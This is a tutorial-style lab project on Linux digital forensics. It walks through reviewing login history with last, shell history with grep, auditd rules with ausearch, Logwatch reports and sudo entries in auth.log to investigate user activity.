User activity on Linux systems can provide valuable insights during forensic investigations. This project will guide you through the process of analyzing user activity, including login records, shell history, and user-specific files. You will learn how to use various tools and techniques to gather and interpret evidence of user actions.
The objective of this project is to provide hands-on experience in analyzing user activity on Linux systems. By the end of this project, you will be able to effectively use forensic tools to investigate user actions and gather relevant evidence.
To complete this project, you will need access to a Linux operating system. You can use a physical machine, set up a virtual machine using software like VirtualBox or VMware, or use a cloud-based Linux instance.
- Basic understanding of Linux OS and command-line interface
- Administrative privileges on the Linux machine
For this project, we will use the following tools:
- last: A command-line tool to display login history.
- ausearch: A tool to query audit logs.
- Grep: A command-line utility for searching plain-text data.
- Logwatch: A log analysis tool.
- Install Logwatch using the package manager:
sudo apt-get install logwatch
Objective: Learn how to analyze login records to understand user login activity.
Steps:
- Open a terminal.
- Use the
last
command to display the login history:last
- Review the output to identify login times, durations, and user accounts.
Expected Output: You should be able to see a history of user logins, including login times, durations, and the accounts used.
Objective: Analyze shell command history files to identify commands executed by users.
Steps:
- Open a terminal.
- Navigate to a user's home directory:
cd /home/username
- Display the contents of the
.bash_history
file:cat .bash_history
- Use
grep
to search for specific commands or keywords:grep "sudo" .bash_history
Expected Output: You should be able to see the history of commands executed by the user and identify specific actions taken.
Objective: Use Auditd to track and analyze user activity.
Steps:
- Ensure the
auditd
service is running:sudo service auditd start
- Add an audit rule to track changes in the user's home directory:
sudo auditctl -w /home/username -p war -k user_activity
- Generate some user activity by creating, modifying, and deleting files in the home directory.
- Use
ausearch
to query the audit logs for user activity:sudo ausearch -k user_activity
Expected Output: You should be able to track and analyze user activities such as file creation, modification, and deletion using Auditd.
Objective: Use Logwatch to generate reports that include user-specific log entries.
Steps:
- Open a terminal.
- Run Logwatch to generate a report that includes user activity logs:
sudo logwatch --detail High --mailto [email protected] --range Today
- Review the generated report in your email or specified output location.
Expected Output: You should receive a detailed report generated by Logwatch that includes user-specific log entries.
Objective: Analyze sudo logs to identify actions performed with elevated privileges.
Steps:
- Open a terminal.
- Navigate to the
/var/log
directory:cd /var/log
- Display the contents of the
auth.log
file and filter for sudo activity:sudo grep "sudo" auth.log
- Review the output to identify commands executed with sudo and the associated user accounts.
Expected Output: You should be able to see a log of commands executed with sudo and identify the users who performed these actions.
With these exercises, you will gain practical experience in forensic analysis of user activity on Linux systems. This will enhance your skills in digital forensics and help you effectively investigate user actions by uncovering valuable evidence of user activities.